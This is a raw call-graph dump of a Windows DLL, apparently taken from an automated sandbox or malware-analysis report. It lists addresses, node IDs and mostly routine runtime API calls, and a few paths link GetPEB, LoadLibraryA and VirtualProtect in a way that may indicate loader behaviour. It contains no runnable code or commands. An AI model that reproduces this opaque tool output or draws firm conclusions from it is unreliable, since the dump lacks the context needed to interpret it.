6fa668e2 ctype 62 API calls 19023->19024 19025 6fa73e45 19024->19025 19083 6fa65ac0 19025->19083 19027 6fa73e5e _memset 19028 6fa66911 ctype 63 API calls 19027->19028 19028->19021 19030 6fa65cd6 19029->19030 19086 6fa6afc3 19030->19086 19032 6fa65d57 19033 6fa6afc3 65 API calls 19032->19033 19034 6fa65d61 19033->19034 19100 6fa664e0 19034->19100 19037 6fa65eba GlobalAlloc 19038 6fa65f12 19037->19038 19039 6fa65d97 19039->19037 19040 6fa667c3 19039->19040 19040->18503 19042 6fa6b201 19041->19042 19043 6fa6b1fc 19041->19043 19045 6fa6b211 19042->19045 19046 6fa73d6c 65 API calls 19042->19046 19044 6fa66dc1 ctype 2 API calls 19043->19044 19044->19042 19045->18503 19046->19045 19047->19047 19050 6fa65e40 19047->19050 19048 6fa667c3 19048->18505 19049 6fa65eba GlobalAlloc 19051 6fa65f12 19049->19051 19050->19047 19050->19048 19050->19049 19050->19050 19056 6fa66250 19052->19056 19053 6fa662f3 ReadFile 19054 6fa661f0 19053->19054 19053->19056 19054->18505 19055 6fa666d2 19056->19053 19056->19055 19061 6fa65de6 19057->19061 19058 6fa65eba GlobalAlloc 19060 6fa65f12 19058->19060 19059 6fa661d2 19059->18505 19060->19060 19061->19058 19061->19059 19061->19061 19068 6fa663fe 19062->19068 19063 6fa666f0 19064 6fa665f3 LoadLibraryA VirtualProtect 19065 6fa667f8 19064->19065 19066 6fa66649 VirtualProtect 19065->19066 19067 6fa66663 19066->19067 19067->18505 19068->19063 19068->19064 19070 6fa752a4 19069->19070 19071 6fa752b0 RaiseException 19069->19071 19070->19071 19071->18495 19073 6fa7527b __CxxThrowException@8 RaiseException 19072->19073 19074 6fa66ddc __EH_prolog3 19073->19074 19108 6fa6ba28 LocalAlloc 19074->19108 19076 6fa66df3 ctype 19076->18492 19078 6fa74618 _realloc 19077->19078 19079 6fa74677 HeapFree 19078->19079 19081 6fa746a0 _realloc 19078->19081 19080 6fa7468a 19079->19080 19079->19081 19082 6fa75348 _realloc 62 API calls 19080->19082 19081->19021 19082->19081 19084 6fa73f43 _memcpy_s 62 API calls 19083->19084 19085 6fa65ad9 19084->19085 19085->19027 19091 6fa6afd6 19086->19091 19087 6fa66dc1 ctype 2 API calls 19087->19091 19088 6fa6afe9 19089 6fa66911 ctype 63 API calls 19088->19089 19093 6fa6aff1 _memset 19089->19093 19090 6fa6b009 19092 6fa668e2 ctype 62 API calls 19090->19092 19091->19087 19091->19088 19091->19090 19091->19093 19094 6fa6b08c 19091->19094 19092->19093 19093->19032 19095 6fa668e2 ctype 62 API calls 19094->19095 19096 6fa6b094 19095->19096 19097 6fa65ac0 62 API calls 19096->19097 19098 6fa6b0a5 _memset 19097->19098 19099 6fa66911 ctype 63 API calls 19098->19099 19099->19093 19105 6fa664ea 19100->19105 19101 6fa665f3 LoadLibraryA VirtualProtect 19106 6fa667f8 19101->19106 19104 6fa65d67 GetPEB 19104->19039 19105->19101 19105->19105 19107 6fa66649 VirtualProtect 19106->19107 19107->19104 19109 6fa6ba41 19108->19109 19110 6fa6ba3c 19108->19110 19109->19076 19112 6fa66d89 19110->19112 19113 6fa7527b __CxxThrowException@8 RaiseException 19112->19113 19114 6fa66da4 19113->19114 19116 6fa648be ctype 19115->19116 19117 6fa662d0 ReadFile 19116->19117 19118 6fa6492c 19117->19118 19119 6fa615f0 63 API calls 19118->19119 19120 6fa6493e 19119->19120 19178 6fa630e0 19120->19178 19122 6fa6496f 19124 6fa64a3d 19122->19124 19181 6fa63150 19122->19181 19126 6fa73f34 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19124->19126 19128 6fa64aae 19126->19128 19127 6fa615f0 63 API calls 19129 6fa64996 19127->19129 19128->18510 19185 6fa65670 19129->19185 19131 6fa649d6 19132 6fa6afc3 65 API calls 19131->19132 19133 6fa649f9 ___crtGetEnvironmentStringsA 19132->19133 19133->19124 19134 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 19133->19134 19134->19124 19136 6fa64b00 19135->19136 19388 6fa63720 19136->19388 19141 6fa6afc3 65 API calls 19142 6fa64e44 19141->19142 19143 6fa64e88 19142->19143 19145 6fa64e63 19142->19145 19144 6fa64e97 19143->19144 19146 6fa66dc1 ctype 2 API calls 19143->19146 19404 6fa657c0 19144->19404 19398 6fa6b0d5 19145->19398 19146->19144 19150 6fa6b0d5 65 API calls 19151 6fa64e86 ctype 19150->19151 19152 6fa64f2a 19151->19152 19153 6fa662d0 ReadFile 19152->19153 19154 6fa64f5b 19153->19154 19155 6fa615f0 63 API calls 19154->19155 19156 6fa64f6f 19155->19156 19425 6fa6afb3 19156->19425 19160 6fa666d2 19159->19160 19163 6fa6626d 19159->19163 19161 6fa662f3 ReadFile 19162 6fa661f0 19161->19162 19161->19163 19162->18532 19163->19160 19163->19161 19165 6fa654f7 19164->19165 19169 6fa654be 19164->19169 19166 6fa631f0 98 API calls 19165->19166 19165->19169 19167 6fa6551a 19166->19167 19168 6fa62600 96 API calls 19167->19168 19168->19169 19169->18532 19171 6fa64616 19170->19171 19172 6fa73f34 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19171->19172 19173 6fa646ee 19172->19173 19173->18509 19175 6fa647f9 19174->19175 19176 6fa73f34 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19175->19176 19177 6fa64873 19176->19177 19177->18528 19197 6fa62b50 19178->19197 19180 6fa630f2 _wcspbrk 19180->19122 19182 6fa6318b ctype 19181->19182 19183 6fa62600 96 API calls 19182->19183 19184 6fa631d7 19183->19184 19184->19127 19186 6fa65681 lstrlenW 19185->19186 19187 6fa6567b 19185->19187 19303 6fa65730 19186->19303 19187->19131 19190 6fa656c5 GetLastError 19192 6fa65716 19190->19192 19193 6fa656d0 WideCharToMultiByte 19190->19193 19191 6fa6571f 19191->19131 19192->19191 19311 6fa65b00 GetLastError 19192->19311 19194 6fa65730 72 API calls 19193->19194 19195 6fa656f4 WideCharToMultiByte 19194->19195 19195->19192 19198 6fa62b7e ctype 19197->19198 19199 6fa62bd1 19198->19199 19200 6fa62bb9 19198->19200 19201 6fa614a0 ctype 63 API calls 19199->19201 19204 6fa6a58c 19200->19204 19203 6fa62bc2 19201->19203 19203->19180 19207 6fa6aef1 19204->19207 19206 6fa6a591 19206->19203 19212 6fa6c050 19207->19212 19209 6fa6af00 19210 6fa6af23 19209->19210 19223 6fa6bb0c 19209->19223 19210->19206 19214 6fa6c05c __EH_prolog3 19212->19214 19213 6fa66dc1 ctype 2 API calls 19213->19214 19214->19213 19215 6fa6c0aa 19214->19215 19229 6fa6bd66 TlsAlloc 19214->19229 19233 6fa6bc4e EnterCriticalSection 19214->19233 19247 6fa6ba5b EnterCriticalSection 19215->19247 19220 6fa6c0bd 19254 6fa6be0d 19220->19254 19221 6fa6c0d0 ctype 19221->19209 19224 6fa6bb18 __EH_prolog3_catch 19223->19224 19225 6fa6bb41 ctype 19224->19225 19286 6fa6c220 19224->19286 19225->19209 19227 6fa6bb27 19296 6fa6c292 19227->19296 19230 6fa6bd97 InitializeCriticalSection 19229->19230 19231 6fa6bd92 19229->19231 19230->19214 19232 6fa66d89 ___DllMainCRTStartup RaiseException 19231->19232 19232->19230 19235 6fa6bc71 19233->19235 19234 6fa6bd30 _memset 19236 6fa6bd47 LeaveCriticalSection 19234->19236 19235->19234 19237 6fa6bcbf GlobalHandle GlobalUnlock 19235->19237 19238 6fa6bcaa ___DllMainCRTStartup 19235->19238 19236->19214 19276 6fa669d7 19237->19276 19240 6fa6bcb2 GlobalAlloc 19238->19240 19242 6fa6bce9 19240->19242 19241 6fa6bcdd GlobalReAlloc 19241->19242 19243 6fa6bd10 GlobalLock 19242->19243 19244 6fa6bcf4 GlobalHandle GlobalLock 19242->19244 19245 6fa6bd02 LeaveCriticalSection 19242->19245 19243->19234 19244->19245 19246 6fa66d89 ___DllMainCRTStartup RaiseException 19245->19246 19246->19243 19248 6fa6ba76 19247->19248 19249 6fa6ba9d LeaveCriticalSection 19247->19249 19248->19249 19251 6fa6ba7b TlsGetValue 19248->19251 19250 6fa6baa6 19249->19250 19250->19220 19250->19221 19251->19249 19252 6fa6ba87 19251->19252 19252->19249 19253 6fa6ba8c LeaveCriticalSection 19252->19253 19253->19250 19278 6fa750fc 19254->19278 19256 6fa6be19 EnterCriticalSection 19257 6fa6be38 19256->19257 19263 6fa6bf1c LeaveCriticalSection 19256->19263 19259 6fa6be41 TlsGetValue 19257->19259 19257->19263 19261 6fa6be7f 19259->19261 19270 6fa6be4f 19259->19270 19260 6fa6bf3f ctype 19260->19221 19262 6fa6ba28 ctype 2 API calls 19261->19262 19264 6fa6be89 19262->19264 19263->19260 19279 6fa6bbbf 19264->19279 19265 6fa6bec4 ___DllMainCRTStartup 19268 6fa6bed0 LocalReAlloc 19265->19268 19266 6fa6be69 ___DllMainCRTStartup 19269 6fa6be73 LocalAlloc 19266->19269 19271 6fa6bedc 19268->19271 19269->19271 19270->19263 19270->19265 19270->19266 19272 6fa6bee0 LeaveCriticalSection 19271->19272 19273 6fa6beee _memset 19271->19273 19274 6fa66d89 ___DllMainCRTStartup RaiseException 19272->19274 19275 6fa6bf07 TlsSetValue 19273->19275 19274->19273 19275->19263 19277 6fa669ec ___DllMainCRTStartup 19276->19277 19277->19241 19278->19256 19282 6fa6bba5 19279->19282 19283 6fa6bbb5 19282->19283 19284 6fa6bbb0 19282->19284 19283->19270 19285 6fa66dc1 ctype LocalAlloc RaiseException 19284->19285 19285->19283 19287 6fa6c235 19286->19287 19288 6fa6c230 19286->19288 19290 6fa6c243 19287->19290 19300 6fa6c1b7 19287->19300 19289 6fa66dc1 ctype 2 API calls 19288->19289 19289->19287 19292 6fa6c255 EnterCriticalSection 19290->19292 19293 6fa6c27f EnterCriticalSection 19290->19293 19294 6fa6c274 LeaveCriticalSection 19292->19294 19295 6fa6c261 InitializeCriticalSection 19292->19295 19293->19227 19294->19293 19295->19294 19297 6fa6c2a4 LeaveCriticalSection 19296->19297 19298 6fa6c29f 19296->19298 19297->19225 19299 6fa66dc1 ctype 2 API calls 19298->19299 19299->19297 19301 6fa6c1d5 19300->19301 19302 6fa6c1c0 InitializeCriticalSection 19300->19302 19301->19290 19302->19301 19304 6fa65734 19303->19304 19305 6fa65771 19304->19305 19310 6fa65788 19304->19310 19313 6fa746a6 19304->19313 19308 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 19305->19308 19305->19310 19308->19310 19309 6fa6569f WideCharToMultiByte 19309->19190 19309->19191 19310->19309 19324 6fa74721 19310->19324 19312 6fa65b0a 19311->19312 19314 6fa746b5 19313->19314 19315 6fa746dd 19313->19315 19314->19315 19317 6fa746c1 19314->19317 19316 6fa746f2 19315->19316 19331 6fa77637 19315->19331 19344 6fa74ac8 19316->19344 19320 6fa75348 _realloc 62 API calls 19317->19320 19321 6fa746c6 19320->19321 19322 6fa7815c __close 6 API calls 19321->19322 19323 6fa746d6 _memset 19322->19323 19323->19305 19325 6fa7b40b __calloc_impl 62 API calls 19324->19325 19326 6fa7473b 19325->19326 19327 6fa75348 _realloc 62 API calls 19326->19327 19330 6fa74757 19326->19330 19328 6fa7474e 19327->19328 19329 6fa75348 _realloc 62 API calls 19328->19329 19328->19330 19329->19330 19330->19310 19332 6fa77643 _realloc 19331->19332 19333 6fa77653 19332->19333 19334 6fa77670 19332->19334 19336 6fa75348 _realloc 62 API calls 19333->19336 19335 6fa776b1 HeapSize 19334->19335 19337 6fa7a914 __lock 62 API calls 19334->19337 19340 6fa77668 _realloc 19335->19340 19338 6fa77658 19336->19338 19341 6fa77680 ___sbh_find_block 19337->19341 19339 6fa7815c __close 6 API calls 19338->19339 19339->19340 19340->19316 19380 6fa776d1 19341->19380 19345 6fa74ad4 _realloc 19344->19345 19346 6fa74adb 19345->19346 19347 6fa74ae9 19345->19347 19348 6fa749fe _malloc 62 API calls 19346->19348 19349 6fa74af0 19347->19349 19350 6fa74afc 19347->19350 19365 6fa74ae3 _realloc 19348->19365 19351 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 19349->19351 19357 6fa74c6e 19350->19357 19377 6fa74b09 ___sbh_resize_block ___sbh_find_block ___crtGetEnvironmentStringsA 19350->19377 19351->19365 19352 6fa74ca1 19353 6fa7c08e _realloc 6 API calls 19352->19353 19356 6fa74ca7 19353->19356 19354 6fa7a914 __lock 62 API calls 19354->19377 19355 6fa74c73 HeapReAlloc 19355->19357 19355->19365 19358 6fa75348 _realloc 62 API calls 19356->19358 19357->19352 19357->19355 19359 6fa74cc5 19357->19359 19360 6fa7c08e _realloc 6 API calls 19357->19360 19363 6fa74cbb 19357->19363 19358->19365 19361 6fa75348 _realloc 62 API calls 19359->19361 19359->19365 19360->19357 19362 6fa74cce GetLastError 19361->19362 19362->19365 19366 6fa75348 _realloc 62 API calls 19363->19366 19365->19323 19368 6fa74c3c 19366->19368 19367 6fa74b94 HeapAlloc 19367->19377 19368->19365 19370 6fa74c41 GetLastError 19368->19370 19369 6fa74be9 HeapReAlloc 19369->19377 19370->19365 19371 6fa7b126 ___sbh_alloc_block 5 API calls 19371->19377 19372 6fa74c54 19372->19365 19374 6fa75348 _realloc 62 API calls 19372->19374 19373 6fa7c08e _realloc 6 API calls 19373->19377 19375 6fa74c61 19374->19375 19375->19362 19375->19365 19376 6fa74c37 19378 6fa75348 _realloc 62 API calls 19376->19378 19377->19352 19377->19354 19377->19365 19377->19367 19377->19369 19377->19371 19377->19372 19377->19373 19377->19376 19379 6fa7a977 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 19377->19379 19384 6fa74c0c 19377->19384 19378->19368 19379->19377 19383 6fa7a83a LeaveCriticalSection 19380->19383 19382 6fa776ac 19382->19335 19382->19340 19383->19382 19387 6fa7a83a LeaveCriticalSection 19384->19387 19386 6fa74c13 19386->19377 19387->19386 19389 6fa63756 19388->19389 19390 6fa6afc3 65 API calls 19389->19390 19391 6fa63769 19390->19391 19392 6fa660f0 CreateFileW 19391->19392 19393 6fa661de 19392->19393 19396 6fa65de6 19392->19396 19394 6fa65eba GlobalAlloc 19397 6fa65f12 19394->19397 19395 6fa64d7d 19395->19141 19396->19394 19396->19395 19396->19396 19399 6fa6b0e5 19398->19399 19400 6fa6b0ff 19398->19400 19401 6fa6afc3 65 API calls 19399->19401 19400->19151 19402 6fa6b0ef 19401->19402 19403 6fa65ac0 62 API calls 19402->19403 19403->19400 19405 6fa657f3 19404->19405 19406 6fa657f8 19404->19406 19408 6fa66dc1 ctype 2 API calls 19405->19408 19407 6fa65841 19406->19407 19410 6fa657fa 19406->19410 19409 6fa658bb 19407->19409 19415 6fa65848 _memset 19407->19415 19408->19406 19412 6fa65992 19409->19412 19417 6fa658c6 _memset 19409->19417 19411 6fa66911 ctype 63 API calls 19410->19411 19414 6fa64ea0 19410->19414 19411->19414 19413 6fa659d8 19412->19413 19416 6fa66dc1 ctype 2 API calls 19412->19416 19420 6fa65ac0 62 API calls 19413->19420 19414->19150 19415->19414 19419 6fa63720 65 API calls 19415->19419 19416->19413 19417->19414 19418 6fa63720 65 API calls 19417->19418 19418->19417 19419->19415 19422 6fa65a0d _memset 19420->19422 19421 6fa65a8e 19423 6fa66911 ctype 63 API calls 19421->19423 19422->19421 19424 6fa63720 65 API calls 19422->19424 19423->19414 19424->19422 19426 6fa66911 ctype 63 API calls 19425->19426 19427 6fa6504b 19426->19427 19427->18532 19430 6fa67696 ctype 19428->19430 19429 6fa67807 19442 6fa677fb 19429->19442 19492 6fa62330 19429->19492 19430->19429 19432 6fa676bd 19430->19432 19449 6fa6748e 19432->19449 19433 6fa73f34 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19435 6fa67835 19433->19435 19435->18535 19442->19433 19526 6fa61440 19443->19526 19445 6fa67312 _memset 19446 6fa66a35 62 API calls 19445->19446 19447 6fa67329 PathStripToRootW 19446->19447 19448 6fa6733d 19447->19448 19448->18537 19450 6fa6749d __EH_prolog3_GS 19449->19450 19451 6fa66dc1 ctype 2 API calls 19450->19451 19452 6fa674c7 GetFullPathNameW 19450->19452 19451->19450 19453 6fa67505 19452->19453 19454 6fa674e0 19452->19454 19456 6fa67524 19453->19456 19457 6fa67509 19453->19457 19499 6fa66a35 19454->19499 19461 6fa672fd 63 API calls 19456->19461 19459 6fa62330 63 API calls 19457->19459 19472 6fa674fe ctype 19457->19472 19458 6fa674ef 19460 6fa6745f 64 API calls 19458->19460 19459->19472 19460->19472 19463 6fa67540 PathIsUNCW 19461->19463 19465 6fa67554 GetVolumeInformationW 19463->19465 19463->19472 19466 6fa67596 19465->19466 19467 6fa67577 19465->19467 19469 6fa675a6 19466->19469 19470 6fa6759f CharUpperW 19466->19470 19468 6fa6745f 64 API calls 19467->19468 19468->19472 19471 6fa675af FindFirstFileW 19469->19471 19469->19472 19470->19469 19471->19472 19473 6fa675c7 FindClose 19471->19473 19505 6fa751b5 19472->19505 19473->19467 19474 6fa675d7 19473->19474 19474->19467 19475 6fa675df lstrlenW 19474->19475 19476 6fa675fc 19475->19476 19477 6fa6762d 19475->19477 19502 6fa66ea0 19476->19502 19477->19472 19479 6fa62330 63 API calls 19477->19479 19479->19472 19493 6fa6234a 19492->19493 19494 6fa6233b 19492->19494 19497 6fa614a0 ctype 63 API calls 19493->19497 19495 6fa614a0 ctype 63 API calls 19494->19495 19496 6fa62344 19495->19496 19496->19442 19498 6fa62369 19497->19498 19498->19442 19508 6fa744cb 19499->19508 19501 6fa66a4b 19501->19458 19517 6fa751ed 19502->19517 19504 6fa66eb3 19504->19472 19506 6fa73f34 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19505->19506 19507 6fa751bf 19506->19507 19507->19507 19513 6fa744dd 19508->19513 19509 6fa744e1 19510 6fa744e6 19509->19510 19511 6fa75348 _realloc 62 API calls 19509->19511 19510->19501 19512 6fa744fd 19511->19512 19514 6fa7815c __close 6 API calls 19512->19514 19513->19509 19513->19510 19515 6fa7452d 19513->19515 19514->19510 19515->19510 19516 6fa75348 _realloc 62 API calls 19515->19516 19516->19512 19518 6fa75205 19517->19518 19519 6fa751fe 19517->19519 19520 6fa75348 _realloc 62 API calls 19518->19520 19519->19518 19524 6fa75231 19519->19524 19521 6fa7520a 19520->19521 19522 6fa7815c __close 6 API calls 19521->19522 19523 6fa75219 19522->19523 19523->19504 19524->19523 19525 6fa75348 _realloc 62 API calls 19524->19525 19525->19521 19527 6fa61465 19526->19527 19528 6fa6145d 19526->19528 19527->19445 19529 6fa613f0 ctype 62 API calls 19528->19529 19529->19527 19531 6fa67bd6 ctype 19530->19531 19532 6fa67bea 19530->19532 19534 6fa67b85 19531->19534 19532->18544 19535 6fa67b91 __EH_prolog3 19534->19535 19536 6fa668e2 ctype 62 API calls 19535->19536 19537 6fa67b98 19536->19537 19538 6fa67bb5 19537->19538 19539 6fa62370 ctype 63 API calls 19537->19539 19540 6fa7527b __CxxThrowException@8 RaiseException 19538->19540 19539->19538 19542 6fa67bca ctype 19540->19542 19541 6fa67bea 19541->19532 19542->19541 19543 6fa67b85 ctype 64 API calls 19542->19543 19543->19541 19545 6fa61580 62 API calls 19544->19545 19546 6fa62f92 19545->19546 19547 6fa613f0 ctype 62 API calls 19546->19547 19548 6fa62fc2 __wcsrev 19546->19548 19547->19548 19549 6fa62f60 62 API calls 19548->19549 19550 6fa62fe0 _wcspbrk 19548->19550 19551 6fa6309f 19549->19551 19550->18548 19552 6fa630a7 19551->19552 19553 6fa630bc 19551->19553 19554 6fa63370 62 API calls 19552->19554 19555 6fa61580 62 API calls 19553->19555 19557 6fa630b8 19554->19557 19556 6fa630c7 19555->19556 19556->18548 19557->18548 19559 6fa63386 19558->19559 19560 6fa63391 19559->19560 19563 6fa633af ctype 19559->19563 19561 6fa61580 62 API calls 19560->19561 19562 6fa6339a 19561->19562 19562->18554 19571 6fa63680 19563->19571 19568 6fa6158f ctype 19566->19568 19567 6fa6159c 19567->18553 19568->19567 19569 6fa73f43 _memcpy_s 62 API calls 19568->19569 19570 6fa615e1 19569->19570 19570->18553 19572 6fa6368b ctype 19571->19572 19573 6fa73f43 _memcpy_s 62 API calls 19572->19573 19574 6fa633e6 19573->19574 19574->18554 19576 6fa6340e 19575->19576 19577 6fa6341f 19575->19577 19584 6fa628d0 LoadResource 19576->19584 19577->18560 19579 6fa63416 19579->19577 19580 6fa63447 19579->19580 19581 6fa613f0 ctype 62 API calls 19579->19581 19582 6fa73f43 _memcpy_s 62 API calls 19580->19582 19581->19580 19583 6fa6347e 19582->19583 19583->18560 19585 6fa628e6 19584->19585 19586 6fa628e9 LockResource 19584->19586 19585->19579 19587 6fa628f7 SizeofResource 19586->19587 19588 6fa6290a 19586->19588 19587->19588 19588->19579 19590 6fa6124c 19589->19590 19597 6fa74320 19590->19597 19593 6fa61286 19600 6fa741a0 19593->19600 19595 6fa613f0 ctype 62 API calls 19595->19593 19596 6fa61294 19596->18577 19603 6fa742c9 19597->19603 19609 6fa74115 19600->19609 19604 6fa742d9 19603->19604 19608 6fa61263 19603->19608 19605 6fa75348 _realloc 62 API calls 19604->19605 19606 6fa742de 19605->19606 19607 6fa7815c __close 6 API calls 19606->19607 19607->19608 19608->19593 19608->19595 19610 6fa74122 19609->19610 19611 6fa7413f 19609->19611 19612 6fa75348 _realloc 62 API calls 19610->19612 19613 6fa7414c 19611->19613 19616 6fa74159 19611->19616 19615 6fa74127 19612->19615 19614 6fa75348 _realloc 62 API calls 19613->19614 19617 6fa74151 19614->19617 19619 6fa7815c __close 6 API calls 19615->19619 19624 6fa7401d 19616->19624 19621 6fa7815c __close 6 API calls 19617->19621 19622 6fa74137 19619->19622 19621->19622 19622->19596 19623 6fa75348 _realloc 62 API calls 19623->19617 19625 6fa7404d 19624->19625 19626 6fa7402d 19624->19626 19628 6fa7405d 19625->19628 19635 6fa7407d 19625->19635 19627 6fa75348 _realloc 62 API calls 19626->19627 19629 6fa74032 19627->19629 19630 6fa75348 _realloc 62 API calls 19628->19630 19631 6fa7815c __close 6 API calls 19629->19631 19632 6fa74062 19630->19632 19637 6fa74042 19631->19637 19633 6fa7815c __close 6 API calls 19632->19633 19633->19637 19634 6fa740c4 19634->19637 19638 6fa784f5 __flsbuf 96 API calls 19634->19638 19635->19634 19635->19637 19639 6fa784f5 19635->19639 19637->19622 19637->19623 19638->19637 19660 6fa7fbb6 19639->19660 19642 6fa78527 19645 6fa7852b 19642->19645 19646 6fa78538 __flswbuf 19642->19646 19643 6fa78510 19644 6fa75348 _realloc 62 API calls 19643->19644 19653 6fa78515 19644->19653 19647 6fa75348 _realloc 62 API calls 19645->19647 19646->19653 19656 6fa7858e 19646->19656 19659 6fa78599 19646->19659 19666 6fa7f99d 19646->19666 19647->19653 19648 6fa78628 19650 6fa7f878 __locking 96 API calls 19648->19650 19649 6fa785a8 19651 6fa785bf 19649->19651 19655 6fa785dc 19649->19655 19650->19653 19678 6fa7f878 19651->19678 19653->19634 19655->19653 19703 6fa7f02c 19655->19703 19656->19659 19675 6fa7f954 19656->19675 19659->19648 19659->19649 19661 6fa7fbc5 19660->19661 19662 6fa78505 19660->19662 19663 6fa75348 _realloc 62 API calls 19661->19663 19662->19642 19662->19643 19664 6fa7fbca 19663->19664 19665 6fa7815c __close 6 API calls 19664->19665 19665->19662 19667 6fa7f9aa 19666->19667 19668 6fa7f9b9 19666->19668 19669 6fa75348 _realloc 62 API calls 19667->19669 19670 6fa7f9dd 19668->19670 19671 6fa75348 _realloc 62 API calls 19668->19671 19672 6fa7f9af 19669->19672 19670->19656 19673 6fa7f9cd 19671->19673 19672->19656 19674 6fa7815c __close 6 API calls 19673->19674 19674->19670 19676 6fa7a5c3 __malloc_crt 62 API calls 19675->19676 19677 6fa7f969 19676->19677 19677->19659 19679 6fa7f884 _realloc 19678->19679 19680 6fa7f8a7 19679->19680 19681 6fa7f88c 19679->19681 19683 6fa7f8b5 19680->19683 19686 6fa7f8f6 19680->19686 19735 6fa7535b 19681->19735 19685 6fa7535b __close 62 API calls 19683->19685 19688 6fa7f8ba 19685->19688 19738 6fa819c1 19686->19738 19687 6fa75348 _realloc 62 API calls 19698 6fa7f899 _realloc 19687->19698 19690 6fa75348 _realloc 62 API calls 19688->19690 19692 6fa7f8c1 19690->19692 19691 6fa7f8fc 19693 6fa7f91f 19691->19693 19694 6fa7f909 19691->19694 19695 6fa7815c __close 6 API calls 19692->19695 19697 6fa75348 _realloc 62 API calls 19693->19697 19748 6fa7f145 19694->19748 19695->19698 19700 6fa7f924 19697->19700 19698->19653 19699 6fa7f917 19807 6fa7f94a 19699->19807 19701 6fa7535b __close 62 API calls 19700->19701 19701->19699 19704 6fa7f038 _realloc 19703->19704 19705 6fa7f065 19704->19705 19706 6fa7f049 19704->19706 19707 6fa7f073 19705->19707 19709 6fa7f094 19705->19709 19708 6fa7535b __close 62 API calls 19706->19708 19710 6fa7535b __close 62 API calls 19707->19710 19711 6fa7f04e 19708->19711 19713 6fa7f0b4 19709->19713 19714 6fa7f0da 19709->19714 19712 6fa7f078 19710->19712 19715 6fa75348 _realloc 62 API calls 19711->19715 19717 6fa75348 _realloc 62 API calls 19712->19717 19718 6fa7535b __close 62 API calls 19713->19718 19716 6fa819c1 ___lock_fhandle 63 API calls 19714->19716 19726 6fa7f056 _realloc 19715->19726 19719 6fa7f0e0 19716->19719 19720 6fa7f07f 19717->19720 19721 6fa7f0b9 19718->19721 19722 6fa7f0ed 19719->19722 19723 6fa7f109 19719->19723 19724 6fa7815c __close 6 API calls 19720->19724 19725 6fa75348 _realloc 62 API calls 19721->19725 19727 6fa7efa7 __lseeki64_nolock 64 API calls 19722->19727 19728 6fa75348 _realloc 62 API calls 19723->19728 19724->19726 19729 6fa7f0c0 19725->19729 19726->19653 19731 6fa7f0fe 19727->19731 19732 6fa7f10e 19728->19732 19730 6fa7815c __close 6 API calls 19729->19730 19730->19726 19854 6fa7f13b 19731->19854 19733 6fa7535b __close 62 API calls 19732->19733 19733->19731 19736 6fa7a206 __getptd_noexit 62 API calls 19735->19736 19737 6fa75360 19736->19737 19737->19687 19740 6fa819cd _realloc 19738->19740 19739 6fa81a28 19741 6fa81a4a _realloc 19739->19741 19742 6fa81a2d EnterCriticalSection 19739->19742 19740->19739 19743 6fa7a914 __lock 62 API calls 19740->19743 19741->19691 19742->19741 19744 6fa819f9 19743->19744 19745 6fa81a10 19744->19745 19746 6fa7e1d3 __mtinitlocknum InitializeCriticalSectionAndSpinCount 19744->19746 19810 6fa81a58 19745->19810 19746->19745 19749 6fa7f154 __write_nolock 19748->19749 19750 6fa7f186 19749->19750 19751 6fa7f1ad 19749->19751 19781 6fa7f17b 19749->19781 19753 6fa7535b __close 62 API calls 19750->19753 19754 6fa7f215 19751->19754 19755 6fa7f1ef 19751->19755 19752 6fa73f34 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19756 6fa7f876 19752->19756 19757 6fa7f18b 19753->19757 19759 6fa7f229 19754->19759 19814 6fa7efa7 19754->19814 19758 6fa7535b __close 62 API calls 19755->19758 19756->19699 19760 6fa75348 _realloc 62 API calls 19757->19760 19761 6fa7f1f4 19758->19761 19764 6fa7f99d __write_nolock 62 API calls 19759->19764 19763 6fa7f192 19760->19763 19765 6fa75348 _realloc 62 API calls 19761->19765 19766 6fa7815c __close 6 API calls 19763->19766 19767 6fa7f234 19764->19767 19768 6fa7f1fd 19765->19768 19766->19781 19769 6fa7f4da 19767->19769 19824 6fa7a27f 19767->19824 19770 6fa7815c __close 6 API calls 19768->19770 19772 6fa7f4ea 19769->19772 19773 6fa7f7a9 WriteFile 19769->19773 19770->19781 19774 6fa7f4fe 19772->19774 19775 6fa7f5c8 19772->19775 19777 6fa7f7dc GetLastError 19773->19777 19799 6fa7f4bc 19773->19799 19778 6fa7f827 19774->19778 19784 6fa7f56c WriteFile 19774->19784 19774->19799 19794 6fa7f5d7 19775->19794 19800 6fa7f6a8 19775->19800 19777->19799 19778->19781 19782 6fa75348 _realloc 62 API calls 19778->19782 19779 6fa7f27a 19779->19769 19780 6fa7f28c GetConsoleCP 19779->19780 19780->19799 19801 6fa7f2af 19780->19801 19781->19752 19785 6fa7f84a 19782->19785 19783 6fa7f7fa 19787 6fa7f805 19783->19787 19788 6fa7f819 19783->19788 19784->19774 19784->19777 19792 6fa7535b __close 62 API calls 19785->19792 19786 6fa7f70e WideCharToMultiByte 19786->19777 19789 6fa7f745 WriteFile 19786->19789 19793 6fa75348 _realloc 62 API calls 19787->19793 19832 6fa7536e 19788->19832 19795 6fa7f77c GetLastError 19789->19795 19789->19800 19790 6fa7f64c WriteFile 19790->19777 19790->19794 19792->19781 19796 6fa7f80a 19793->19796 19794->19778 19794->19790 19794->19799 19795->19800 19797 6fa7535b __close 62 API calls 19796->19797 19797->19781 19799->19778 19799->19781 19799->19783 19800->19778 19800->19786 19800->19789 19800->19799 19801->19777 19801->19799 19802 6fa7f35b WideCharToMultiByte 19801->19802 19803 6fa80932 74 API calls __fassign 19801->19803 19805 6fa81a88 11 API calls __putwch_nolock 19801->19805 19806 6fa7f3e0 WriteFile 19801->19806 19829 6fa80984 19801->19829 19802->19799 19804 6fa7f38c WriteFile 19802->19804 19803->19801 19804->19777 19804->19801 19805->19801 19806->19777 19806->19801 19853 6fa81a61 LeaveCriticalSection 19807->19853 19809 6fa7f952 19809->19698 19813 6fa7a83a LeaveCriticalSection 19810->19813 19812 6fa81a5f 19812->19739 19813->19812 19837 6fa8194a 19814->19837 19816 6fa7efc5 19817 6fa7efde SetFilePointer 19816->19817 19818 6fa7efcd 19816->19818 19820 6fa7eff6 GetLastError 19817->19820 19821 6fa7efd2 